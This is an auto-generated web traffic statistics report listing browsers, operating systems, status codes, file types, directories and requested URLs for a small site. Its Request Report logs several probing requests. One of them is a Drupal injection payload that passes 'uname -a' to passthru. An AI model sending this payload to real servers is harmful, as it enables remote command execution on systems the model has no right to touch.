<tr><td class="R">1104</td><td class="P">404</td><td class="xl">Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)</td></tr>
<tr><td class="R">2437</td><td class="P">365</td><td class="xl">Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)</td></tr>
<tr><td class="R">601</td><td class="P">273</td><td class="xl">Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.181 Safari/537.36</td></tr>
<tr><td class="R">606</td><td class="P">264</td><td class="xl">Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)</td></tr>
<tr><td class="R">228</td><td class="P">201</td><td class="xl">Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.75 Safari/537.36 Google Favicon</td></tr>
<tr><td class="R">183</td><td class="P">177</td><td class="xl">Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.100 Safari/537.36</td></tr>
<tr><td class="R">150</td><td class="P">150</td><td class="xl">Mozilla/5.0 (compatible; CloudFlare-AlwaysOnline/1.0; +http://www.cloudflare.com/always-online)</td></tr>
<tr><td class="R">818</td><td class="P">149</td><td class="xl">Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.99 Safari/537.36</td></tr>
<tr><td class="R">3681</td><td class="P">143</td><td class="xl">Mozilla/5.0 (compatible; CloudFlare-AlwaysOnline/1.0; +http://www.cloudflare.com/always-online) AppleWebKit/534.34</td></tr>
<tr><td class="R">194</td><td class="P">141</td><td class="xl">Sogou web spider/4.0(+http://www.sogou.com/docs/help/webmasters.htm#07)</td></tr>
<tr><td class="R">122</td><td class="P">122</td><td class="xl">Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko)             Chrome/66.0.3359.181 Safari/537.36</td></tr>
<tr><td class="R">560</td><td class="P">114</td><td class="xl">Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3440.106 Safari/537.36</td></tr>
<tr><td class="R">113</td><td class="P">113</td><td class="xl">Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0</td></tr>
<tr><td class="R">111</td><td class="P">111</td><td class="xl">Magic Browser</td></tr>
<tr><td class="R">181</td><td class="P">103</td><td class="xl">Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.85 Safari/537.36</td></tr>
<tr><td class="R">530</td><td class="P">87</td><td class="xl">Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.100 Safari/537.36</td></tr>
<tr><td class="R">363</td><td class="P">86</td><td class="xl">Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36</td></tr>
<tr><td class="R">69</td><td class="P">69</td><td class="xl">Ruby</td></tr>
<tr><td class="R">109</td><td class="P">64</td><td class="xl">Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36</td></tr>
<tr><td class="R">60</td><td class="P">60</td><td class="xl">Apache-HttpClient/4.5.2 (Java/1.8.0_151)</td></tr>
<tr><td class="R">205</td><td class="P">55</td><td class="xl">Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3440.106 Safari/537.36</td></tr>
<tr><td class="R">636</td><td class="P">53</td><td class="xl">Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Safari/537.36</td></tr>
<tr><td class="R">49</td><td class="P">49</td><td class="xl">Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1</td></tr>
<tr><td class="R">182</td><td class="P">48</td><td class="xl">Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.99 Safari/537.36</td></tr>
<tr><td class="R">48</td><td class="P">48</td><td class="xl">Mozilla/5.0 (compatible; NetcraftSurveyAgent/1.0; +info@netcraft.com)</td></tr>
<tr><td class="R">45</td><td class="P">45</td><td class="xl">Mozilla/5.0 (Windows NT 6.1; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0</td></tr>
<tr><td class="R">59</td><td class="P">45</td><td class="xl">Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko</td></tr>
<tr><td class="R">184</td><td class="P">44</td><td class="xl">Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36</td></tr>
<tr><td class="R">46</td><td class="P">44</td><td class="xl">Mozilla/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0</td></tr>
<tr><td class="R">44</td><td class="P">44</td><td class="xl">Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.117 Safari/537.36</td></tr>
<tr><td class="R">44</td><td class="P">44</td><td class="xl">OrgProbe/2.0.0 (+http://www.blocked.org.uk)</td></tr>
<tr><td class="R">220</td><td class="P">44</td><td class="xl">Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.87 Safari/537.36</td></tr>
<tr><td class="R">42</td><td class="P">42</td><td class="xl">Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36</td></tr>
<tr><td class="R">41</td><td class="P">41</td><td class="xl">Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36</td></tr>
<tr><td class="R">214</td><td class="P">39</td><td class="xl">Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.99 Safari/537.36</td></tr>
<tr><td class="R">157</td><td class="P">38</td><td class="xl">Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36</td></tr>
<tr><td class="R">126</td><td class="P">37</td><td class="xl">Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.100 Safari/537.36</td></tr>
<tr><td class="R">24835</td><td class="P">3858</td><td class="xl">[not listed: 1,460 browsers]</td></tr>
</tbody></table>
</div><div class="browsum"><h2><a name="browsum" id="browsum">Browser Summary</a></h2>
<p class="goto">(<span class="gototitle">Go To</span>: <a href="#Top">Top</a> | <a href="#gensum">General Summary</a> | <a href="#month">Monthly Report</a> | <a href="#daysum">Daily Summary</a> | <a href="#hoursum">Hourly Summary</a> | <a href="#dom">Domain Report</a> | <a href="#org">Organization Report</a> | <a href="#redirref">Redirected Referrer Report</a> | <a href="#refsite">Referring Site Report</a> | <a href="#browrep">Browser Report</a> | Browser Summary | <a href="#os">Operating System Report</a> | <a href="#code">Status Code Report</a> | <a href="#size">File Size Report</a> | <a href="#type">File Type Report</a> | <a href="#dir">Directory Report</a> | <a href="#req">Request Report</a>)</p>
<p><img src="./browsum.png" alt="" /></p>
<p class="whatinc">
Listing the top 20 browsers by the number of requests for pages, sorted by the number of requests for pages.</p>
<table>
<thead><tr><th class="N"> #</th><th class="R">#reqs</th><th class="P">#pages</th><th class="xl">browser</th></tr></thead>
<tbody><tr><td class="N">1</td><td class="R">22804</td><td class="P">4557</td><td class="xl">Safari</td></tr>
<tr class="sub level2"><td class="N">&nbsp;</td><td class="R">17677</td><td class="P">4100</td><td class="xl">&nbsp;&nbsp;Safari/537</td></tr>
<tr class="sub level2"><td class="N">&nbsp;</td><td class="R">2299</td><td class="P">200</td><td class="xl">&nbsp;&nbsp;Safari/604</td></tr>
<tr class="sub level2"><td class="N">&nbsp;</td><td class="R">971</td><td class="P">67</td><td class="xl">&nbsp;&nbsp;Safari/605</td></tr>
<tr class="sub level2"><td class="N">&nbsp;</td><td class="R">222</td><td class="P">49</td><td class="xl">&nbsp;&nbsp;Safari/601</td></tr>
<tr class="sub level2"><td class="N">&nbsp;</td><td class="R">617</td><td class="P">30</td><td class="xl">&nbsp;&nbsp;Safari/602</td></tr>
<tr class="sub level2"><td class="N">&nbsp;</td><td class="R">35</td><td class="P">26</td><td class="xl">&nbsp;&nbsp;Safari/534</td></tr>
<tr class="sub level2"><td class="N">&nbsp;</td><td class="R">288</td><td class="P">25</td><td class="xl">&nbsp;&nbsp;Safari/600</td></tr>
<tr class="sub level2"><td class="N">&nbsp;</td><td class="R">230</td><td class="P">19</td><td class="xl">&nbsp;&nbsp;Safari/603</td></tr>
<tr class="sub level2"><td class="N">&nbsp;</td><td class="R">303</td><td class="P">12</td><td class="xl">&nbsp;&nbsp;Safari/535</td></tr>
<tr class="sub level2"><td class="N">&nbsp;</td><td class="R">11</td><td class="P">8</td><td class="xl">&nbsp;&nbsp;Safari/533</td></tr>
<tr><td class="N">2</td><td class="R">10917</td><td class="P">2351</td><td class="xl">Netscape (compatible)</td></tr>
<tr><td class="N">3</td><td class="R">3823</td><td class="P">1315</td><td class="xl">Firefox</td></tr>
<tr class="sub level2"><td class="N">&nbsp;</td><td class="R">681</td><td class="P">650</td><td class="xl">&nbsp;&nbsp;Firefox/40</td></tr>
<tr class="sub level2"><td class="N">&nbsp;</td><td class="R">122</td><td class="P">116</td><td class="xl">&nbsp;&nbsp;Firefox/56</td></tr>
<tr class="sub level2"><td class="N">&nbsp;</td><td class="R">96</td><td class="P">94</td><td class="xl">&nbsp;&nbsp;Firefox/45</td></tr>
<tr class="sub level2"><td class="N">&nbsp;</td><td class="R">738</td><td class="P">62</td><td class="xl">&nbsp;&nbsp;Firefox/59</td></tr>
<tr class="sub level2"><td class="N">&nbsp;</td><td class="R">70</td><td class="P">62</td><td class="xl">&nbsp;&nbsp;Firefox/3</td></tr>
<tr class="sub level2"><td class="N">&nbsp;</td><td class="R">260</td><td class="P">33</td><td class="xl">&nbsp;&nbsp;Firefox/60</td></tr>
<tr class="sub level2"><td class="N">&nbsp;</td><td class="R">66</td><td class="P">29</td><td class="xl">&nbsp;&nbsp;Firefox/57</td></tr>
<tr class="sub level2"><td class="N">&nbsp;</td><td class="R">107</td><td class="P">29</td><td class="xl">&nbsp;&nbsp;Firefox/61</td></tr>
<tr class="sub level2"><td class="N">&nbsp;</td><td class="R">198</td><td class="P">23</td><td class="xl">&nbsp;&nbsp;Firefox/58</td></tr>
<tr class="sub level2"><td class="N">&nbsp;</td><td class="R">352</td><td class="P">22</td><td class="xl">&nbsp;&nbsp;Firefox/50</td></tr>
<tr><td class="N">4</td><td class="R">894</td><td class="P">457</td><td class="xl">MSIE</td></tr>
<tr class="sub level2"><td class="N">&nbsp;</td><td class="R">443</td><td class="P">300</td><td class="xl">&nbsp;&nbsp;MSIE/6</td></tr>
<tr class="sub level2"><td class="N">&nbsp;</td><td class="R">54</td><td class="P">54</td><td class="xl">&nbsp;&nbsp;MSIE/5</td></tr>
<tr class="sub level2"><td class="N">&nbsp;</td><td class="R">78</td><td class="P">42</td><td class="xl">&nbsp;&nbsp;MSIE/7</td></tr>
<tr class="sub level2"><td class="N">&nbsp;</td><td class="R">139</td><td class="P">38</td><td class="xl">&nbsp;&nbsp;MSIE/9</td></tr>
<tr class="sub level2"><td class="N">&nbsp;</td><td class="R">67</td><td class="P">15</td><td class="xl">&nbsp;&nbsp;MSIE/8</td></tr>
<tr class="sub level2"><td class="N">&nbsp;</td><td class="R">110</td><td class="P">5</td><td class="xl">&nbsp;&nbsp;MSIE/10</td></tr>
<tr class="sub level2"><td class="N">&nbsp;</td><td class="R">3</td><td class="P">3</td><td class="xl">&nbsp;&nbsp;MSIE/4</td></tr>
<tr><td class="N">5</td><td class="R">1749</td><td class="P">143</td><td class="xl">Mozilla</td></tr>
<tr class="sub level2"><td class="N">&nbsp;</td><td class="R">6</td><td class="P">6</td><td class="xl">&nbsp;&nbsp;Mozilla/1</td></tr>
<tr><td class="N">6</td><td class="R">194</td><td class="P">141</td><td class="xl">Sogou web spider</td></tr>
<tr class="sub level2"><td class="N">&nbsp;</td><td class="R">194</td><td class="P">141</td><td class="xl">&nbsp;&nbsp;Sogou web spider/4</td></tr>
<tr><td class="N">7</td><td class="R">111</td><td class="P">111</td><td class="xl">Magic Browser</td></tr>
<tr><td class="N">8</td><td class="R">212</td><td class="P">95</td><td class="xl">Opera</td></tr>
<tr class="sub level2"><td class="N">&nbsp;</td><td class="R">141</td><td class="P">36</td><td class="xl">&nbsp;&nbsp;Opera/9</td></tr>
<tr class="sub level2"><td class="N">&nbsp;</td><td class="R">30</td><td class="P">30</td><td class="xl">&nbsp;&nbsp;Opera/7</td></tr>
<tr class="sub level2"><td class="N">&nbsp;</td><td class="R">32</td><td class="P">26</td><td class="xl">&nbsp;&nbsp;Opera/8</td></tr>
<tr class="sub level2"><td class="N">&nbsp;</td><td class="R">3</td><td class="P">3</td><td class="xl">&nbsp;&nbsp;Opera/6</td></tr>
<tr><td class="N">9</td><td class="R">76</td><td class="P">76</td><td class="xl">Apache-HttpClient</td></tr>
<tr class="sub level2"><td class="N">&nbsp;</td><td class="R">76</td><td class="P">76</td><td class="xl">&nbsp;&nbsp;Apache-HttpClient/4</td></tr>
<tr><td class="N">10</td><td class="R">69</td><td class="P">69</td><td class="xl">Ruby</td></tr>
<tr><td class="N">11</td><td class="R">147</td><td class="P">58</td><td class="xl">python-requests</td></tr>
<tr class="sub level2"><td class="N">&nbsp;</td><td class="R">147</td><td class="P">58</td><td class="xl">&nbsp;&nbsp;python-requests/2</td></tr>
<tr><td class="N">12</td><td class="R">45</td><td class="P">45</td><td class="xl">OrgProbe</td></tr>
<tr class="sub level2"><td class="N">&nbsp;</td><td class="R">44</td><td class="P">44</td><td class="xl">&nbsp;&nbsp;OrgProbe/2</td></tr>
<tr class="sub level2"><td class="N">&nbsp;</td><td class="R">1</td><td class="P">1</td><td class="xl">&nbsp;&nbsp;OrgProbe/0</td></tr>
<tr><td class="N">13</td><td class="R">39</td><td class="P">39</td><td class="xl">Netscape</td></tr>
<tr class="sub level2"><td class="N">&nbsp;</td><td class="R">23</td><td class="P">23</td><td class="xl">&nbsp;&nbsp;Netscape/4</td></tr>
<tr class="sub level2"><td class="N">&nbsp;</td><td class="R">13</td><td class="P">13</td><td class="xl">&nbsp;&nbsp;Netscape/5</td></tr>
<tr><td class="N">14</td><td class="R">32</td><td class="P">23</td><td class="xl">WhatsApp</td></tr>
<tr class="sub level2"><td class="N">&nbsp;</td><td class="R">31</td><td class="P">22</td><td class="xl">&nbsp;&nbsp;WhatsApp/2</td></tr>
<tr class="sub level2"><td class="N">&nbsp;</td><td class="R">1</td><td class="P">1</td><td class="xl">&nbsp;&nbsp;WhatsApp/0</td></tr>
<tr><td class="N">15</td><td class="R">22</td><td class="P">22</td><td class="xl">curl</td></tr>
<tr class="sub level2"><td class="N">&nbsp;</td><td class="R">22</td><td class="P">22</td><td class="xl">&nbsp;&nbsp;curl/7</td></tr>
<tr><td class="N">16</td><td class="R">154</td><td class="P">19</td><td class="xl">CCBot</td></tr>
<tr class="sub level2"><td class="N">&nbsp;</td><td class="R">154</td><td class="P">19</td><td class="xl">&nbsp;&nbsp;CCBot/2</td></tr>
<tr><td class="N">17</td><td class="R">15</td><td class="P">15</td><td class="xl">the beast</td></tr>
<tr><td class="N">18</td><td class="R">86</td><td class="P">15</td><td class="xl">facebookexternalhit</td></tr>
<tr class="sub level2"><td class="N">&nbsp;</td><td class="R">86</td><td class="P">15</td><td class="xl">&nbsp;&nbsp;facebookexternalhit/1</td></tr>
<tr><td class="N">19</td><td class="R">14</td><td class="P">14</td><td class="xl">Go-http-client</td></tr>
<tr class="sub level2"><td class="N">&nbsp;</td><td class="R">8</td><td class="P">8</td><td class="xl">&nbsp;&nbsp;Go-http-client/1</td></tr>
<tr class="sub level2"><td class="N">&nbsp;</td><td class="R">6</td><td class="P">6</td><td class="xl">&nbsp;&nbsp;Go-http-client/2</td></tr>
<tr><td class="N">20</td><td class="R">13</td><td class="P">13</td><td class="xl">Surf</td></tr>
<tr class="sub level2"><td class="N">&nbsp;</td><td class="R">13</td><td class="P">13</td><td class="xl">&nbsp;&nbsp;Surf/1</td></tr>
<tr><td class="N">&nbsp;</td><td class="R">774</td><td class="P">118</td><td class="xl">[not listed: 56 browsers]</td></tr>
</tbody></table>
</div><div class="os"><h2><a name="os" id="os">Operating System Report</a></h2>
<p class="goto">(<span class="gototitle">Go To</span>: <a href="#Top">Top</a> | <a href="#gensum">General Summary</a> | <a href="#month">Monthly Report</a> | <a href="#daysum">Daily Summary</a> | <a href="#hoursum">Hourly Summary</a> | <a href="#dom">Domain Report</a> | <a href="#org">Organization Report</a> | <a href="#redirref">Redirected Referrer Report</a> | <a href="#refsite">Referring Site Report</a> | <a href="#browrep">Browser Report</a> | <a href="#browsum">Browser Summary</a> | Operating System Report | <a href="#code">Status Code Report</a> | <a href="#size">File Size Report</a> | <a href="#type">File Type Report</a> | <a href="#dir">Directory Report</a> | <a href="#req">Request Report</a>)</p>
<p><img src="./os.png" alt="" /></p>
<p class="whatinc">
Listing operating systems, sorted by the number of requests for pages.</p>
<table>
<thead><tr><th class="N"> #</th><th class="R">#reqs</th><th class="P">#pages</th><th class="xl">OS</th></tr></thead>
<tbody><tr><td class="N">1</td><td class="R">16435</td><td class="P">4440</td><td class="xl">Windows</td></tr>
<tr class="sub level2"><td class="N">&nbsp;</td><td class="R">7832</td><td class="P">2112</td><td class="xl">&nbsp;&nbsp;Unknown Windows</td></tr>
<tr class="sub level2"><td class="N">&nbsp;</td><td class="R">7829</td><td class="P">1773</td><td class="xl">&nbsp;&nbsp;Windows NT</td></tr>
<tr class="sub level2"><td class="N">&nbsp;</td><td class="R">594</td><td class="P">404</td><td class="xl">&nbsp;&nbsp;Windows XP</td></tr>
<tr class="sub level2"><td class="N">&nbsp;</td><td class="R">78</td><td class="P">55</td><td class="xl">&nbsp;&nbsp;Windows 2000</td></tr>
<tr class="sub level2"><td class="N">&nbsp;</td><td class="R">51</td><td class="P">51</td><td class="xl">&nbsp;&nbsp;Windows Server 2003</td></tr>
<tr class="sub level2"><td class="N">&nbsp;</td><td class="R">20</td><td class="P">20</td><td class="xl">&nbsp;&nbsp;Windows 95</td></tr>
<tr class="sub level2"><td class="N">&nbsp;</td><td class="R">16</td><td class="P">16</td><td class="xl">&nbsp;&nbsp;Windows ME</td></tr>
<tr class="sub level2"><td class="N">&nbsp;</td><td class="R">11</td><td class="P">5</td><td class="xl">&nbsp;&nbsp;Windows 98</td></tr>
<tr class="sub level2"><td class="N">&nbsp;</td><td class="R">3</td><td class="P">3</td><td class="xl">&nbsp;&nbsp;Windows 3.1</td></tr>
<tr class="sub level2"><td class="N">&nbsp;</td><td class="R">1</td><td class="P">1</td><td class="xl">&nbsp;&nbsp;Windows CE</td></tr>
<tr><td class="N">2</td><td class="R">11302</td><td class="P">2562</td><td class="xl">OS unknown</td></tr>
<tr><td class="N">3</td><td class="R">5812</td><td class="P">1307</td><td class="xl">Unix</td></tr>
<tr class="sub level2"><td class="N">&nbsp;</td><td class="R">5805</td><td class="P">1301</td><td class="xl">&nbsp;&nbsp;Linux</td></tr>
<tr class="sub level2"><td class="N">&nbsp;</td><td class="R">6</td><td class="P">5</td><td class="xl">&nbsp;&nbsp;Other Unix</td></tr>
<tr class="sub level2"><td class="N">&nbsp;</td><td class="R">1</td><td class="P">1</td><td class="xl">&nbsp;&nbsp;BSD</td></tr>
<tr><td class="N">4</td><td class="R">6789</td><td class="P">838</td><td class="xl">Macintosh</td></tr>
<tr><td class="N">5</td><td class="R">1852</td><td class="P">549</td><td class="xl">Known robots</td></tr>
</tbody></table>
</div><div class="code"><h2><a name="code" id="code">Status Code Report</a></h2>
<p class="goto">(<span class="gototitle">Go To</span>: <a href="#Top">Top</a> | <a href="#gensum">General Summary</a> | <a href="#month">Monthly Report</a> | <a href="#daysum">Daily Summary</a> | <a href="#hoursum">Hourly Summary</a> | <a href="#dom">Domain Report</a> | <a href="#org">Organization Report</a> | <a href="#redirref">Redirected Referrer Report</a> | <a href="#refsite">Referring Site Report</a> | <a href="#browrep">Browser Report</a> | <a href="#browsum">Browser Summary</a> | <a href="#os">Operating System Report</a> | Status Code Report | <a href="#size">File Size Report</a> | <a href="#type">File Type Report</a> | <a href="#dir">Directory Report</a> | <a href="#req">Request Report</a>)</p>
<p><img src="./code.png" alt="" /></p>
<p class="whatinc">
Listing status codes, sorted numerically.</p>
<table>
<thead><tr><th class="R">#reqs</th><th class="xl">status code</th></tr></thead>
<tbody><tr><td class="R">39236</td><td class="xl">200 OK</td></tr>
<tr><td class="R">2</td><td class="xl">301 Document moved permanently</td></tr>
<tr><td class="R">14207</td><td class="xl">302 Document found elsewhere</td></tr>
<tr><td class="R">3313</td><td class="xl">304 Not modified since last retrieval</td></tr>
</tbody></table>
</div><div class="size"><h2><a name="size" id="size">File Size Report</a></h2>
<p class="goto">(<span class="gototitle">Go To</span>: <a href="#Top">Top</a> | <a href="#gensum">General Summary</a> | <a href="#month">Monthly Report</a> | <a href="#daysum">Daily Summary</a> | <a href="#hoursum">Hourly Summary</a> | <a href="#dom">Domain Report</a> | <a href="#org">Organization Report</a> | <a href="#redirref">Redirected Referrer Report</a> | <a href="#refsite">Referring Site Report</a> | <a href="#browrep">Browser Report</a> | <a href="#browsum">Browser Summary</a> | <a href="#os">Operating System Report</a> | <a href="#code">Status Code Report</a> | File Size Report | <a href="#type">File Type Report</a> | <a href="#dir">Directory Report</a> | <a href="#req">Request Report</a>)</p>
<p><img src="./size.png" alt="" /></p>
<table>
<thead><tr><th class="x">size</th><th class="R">#reqs</th><th class="b">%bytes</th></tr></thead>
<tbody><tr><td class="x">          0</td><td class="R">3735</td><td class="b">&nbsp;</td></tr>
<tr><td class="x">   1B-  10B</td><td class="R">2</td><td class="b">&nbsp;</td></tr>
<tr><td class="x">  11B- 100B</td><td class="R">0</td><td class="b">&nbsp;</td></tr>
<tr><td class="x"> 101B-  1kB</td><td class="R">1935</td><td class="b"> 0.06%</td></tr>
<tr><td class="x">  1kB- 10kB</td><td class="R">7213</td><td class="b"> 1.77%</td></tr>
<tr><td class="x"> 10kB-100kB</td><td class="R">25957</td><td class="b">49.90%</td></tr>
<tr><td class="x">100kB-  1MB</td><td class="R">3707</td><td class="b">48.27%</td></tr>
</tbody></table>
</div><div class="type"><h2><a name="type" id="type">File Type Report</a></h2>
<p class="goto">(<span class="gototitle">Go To</span>: <a href="#Top">Top</a> | <a href="#gensum">General Summary</a> | <a href="#month">Monthly Report</a> | <a href="#daysum">Daily Summary</a> | <a href="#hoursum">Hourly Summary</a> | <a href="#dom">Domain Report</a> | <a href="#org">Organization Report</a> | <a href="#redirref">Redirected Referrer Report</a> | <a href="#refsite">Referring Site Report</a> | <a href="#browrep">Browser Report</a> | <a href="#browsum">Browser Summary</a> | <a href="#os">Operating System Report</a> | <a href="#code">Status Code Report</a> | <a href="#size">File Size Report</a> | File Type Report | <a href="#dir">Directory Report</a> | <a href="#req">Request Report</a>)</p>
<p><img src="./type.png" alt="" /></p>
<p class="whatinc">
Listing extensions with at least 0.1% of the traffic, sorted by the amount of traffic.</p>
<table>
<thead><tr><th class="R">#reqs</th><th class="b">%bytes</th><th class="xl">extension</th></tr></thead>
<tbody><tr><td class="R">5059</td><td class="b">36.06%</td><td class="xl">.jpg  [JPEG graphics]</td></tr>
<tr><td class="R">10739</td><td class="b">24.11%</td><td class="xl">.js   [JavaScript code]</td></tr>
<tr><td class="R">9784</td><td class="b">17.02%</td><td class="xl">[directories]</td></tr>
<tr><td class="R">4942</td><td class="b"> 7.97%</td><td class="xl">[no extension]</td></tr>
<tr><td class="R">5211</td><td class="b"> 5.22%</td><td class="xl">.css  [Cascading Style Sheets]</td></tr>
<tr><td class="R">3465</td><td class="b"> 4.77%</td><td class="xl">.png  [PNG graphics]</td></tr>
<tr><td class="R">2688</td><td class="b"> 4.49%</td><td class="xl">.php  [PHP]</td></tr>
<tr><td class="R">387</td><td class="b"> 0.34%</td><td class="xl">.ico</td></tr>
<tr><td class="R">274</td><td class="b"> 0.03%</td><td class="xl">[not listed: 2 extensions]</td></tr>
</tbody></table>
</div><div class="dir"><h2><a name="dir" id="dir">Directory Report</a></h2>
<p class="goto">(<span class="gototitle">Go To</span>: <a href="#Top">Top</a> | <a href="#gensum">General Summary</a> | <a href="#month">Monthly Report</a> | <a href="#daysum">Daily Summary</a> | <a href="#hoursum">Hourly Summary</a> | <a href="#dom">Domain Report</a> | <a href="#org">Organization Report</a> | <a href="#redirref">Redirected Referrer Report</a> | <a href="#refsite">Referring Site Report</a> | <a href="#browrep">Browser Report</a> | <a href="#browsum">Browser Summary</a> | <a href="#os">Operating System Report</a> | <a href="#code">Status Code Report</a> | <a href="#size">File Size Report</a> | <a href="#type">File Type Report</a> | Directory Report | <a href="#req">Request Report</a>)</p>
<p><img src="./dir.png" alt="" /></p>
<p class="whatinc">
Listing directories with at least 0.01% of the traffic, sorted by the amount of traffic.</p>
<table>
<thead><tr><th class="R">#reqs</th><th class="b">%bytes</th><th class="xl">directory</th></tr></thead>
<tbody><tr><td class="R">25055</td><td class="b">70.50%</td><td class="xl">/assets/</td></tr>
<tr><td class="R">15966</td><td class="b">27.40%</td><td class="xl">[root directory]</td></tr>
<tr><td class="R">1001</td><td class="b"> 1.37%</td><td class="xl">/accommodation/</td></tr>
<tr><td class="R">492</td><td class="b"> 0.65%</td><td class="xl">/facilities/</td></tr>
<tr><td class="R">30</td><td class="b"> 0.07%</td><td class="xl">/contact-us/</td></tr>
<tr><td class="R">5</td><td class="b"> 0.01%</td><td class="xl">[not listed: 1 directory]</td></tr>
</tbody></table>
</div><div class="req"><h2><a name="req" id="req">Request Report</a></h2>
<p class="goto">(<span class="gototitle">Go To</span>: <a href="#Top">Top</a> | <a href="#gensum">General Summary</a> | <a href="#month">Monthly Report</a> | <a href="#daysum">Daily Summary</a> | <a href="#hoursum">Hourly Summary</a> | <a href="#dom">Domain Report</a> | <a href="#org">Organization Report</a> | <a href="#redirref">Redirected Referrer Report</a> | <a href="#refsite">Referring Site Report</a> | <a href="#browrep">Browser Report</a> | <a href="#browsum">Browser Summary</a> | <a href="#os">Operating System Report</a> | <a href="#code">Status Code Report</a> | <a href="#size">File Size Report</a> | <a href="#type">File Type Report</a> | <a href="#dir">Directory Report</a> | Request Report)</p>
<p><img src="./req.png" alt="" /></p>
<p class="whatinc">
Listing files with at least 20 requests, sorted by the number of requests.</p>
<table>
<thead><tr><th class="R">#reqs</th><th class="b">%bytes</th><th class="D">last time</th><th class="xl">file</th></tr></thead>
<tbody><tr><td class="R">9748</td><td class="b">16.94%</td><td class="D">Nov/30/18  3:00 PM</td><td class="xl"><a href="/">/</a></td></tr>
<tr class="sub level2"><td class="R">39</td><td class="b"> 0.07%</td><td class="D">Nov/21/18 12:21 AM</td><td class="xl">&nbsp;&nbsp;<a href="/?q=file/ajax/name/%23value/">/?q=file/ajax/name/#value/</a></td></tr>
<tr class="sub level2"><td class="R">30</td><td class="b"> 0.05%</td><td class="D">Nov/28/18 10:47 PM</td><td class="xl">&nbsp;&nbsp;<a href="/?id=1">/?id=1</a></td></tr>
<tr class="sub level2"><td class="R">30</td><td class="b"> 0.05%</td><td class="D">Nov/23/18  5:58 PM</td><td class="xl">&nbsp;&nbsp;<a href="/?172.68.211.147">/?172.68.211.147</a></td></tr>
<tr class="sub level2"><td class="R">20</td><td class="b"> 0.04%</td><td class="D">Nov/26/18  3:10 AM</td><td class="xl">&nbsp;&nbsp;<a href="/?q=user/register">/?q=user/register</a></td></tr>
<tr class="sub level2"><td class="R">17</td><td class="b"> 0.03%</td><td class="D">Jul/14/18  4:26 PM</td><td class="xl">&nbsp;&nbsp;<a href="/?q=user/password&amp;name%5B%23post_render%5D%5B%5D=passthru&amp;name%5B%23type%5D=markup&amp;name%5B%23markup%5D=uname+-a">/?q=user/password&amp;name[#post_render][]=passthru&amp;name[#type]=markup&amp;name[#markup]=uname+-a</a></td></tr>
<tr class="sub level2"><td class="R">15</td><td class="b"> 0.03%</td><td class="D">Nov/24/18  6:18 PM</td><td class="xl">&nbsp;&nbsp;<a href="/?172.68.189.240">/?172.68.189.240</a></td></tr>
<tr class="sub level2"><td class="R">15</td><td class="b"> 0.03%</td><td class="D">Jul/ 1/18  5:46 PM</td><td class="xl">&nbsp;&nbsp;<a href="/?172.68.58.84">/?172.68.58.84</a></td></tr>
<tr class="sub level2"><td class="R">14</td><td class="b"> 0.03%</td><td class="D">Nov/26/18  3:10 AM</td><td class="xl">&nbsp;&nbsp;<a href="/?q=node/add">/?q=node/add</a></td></tr>
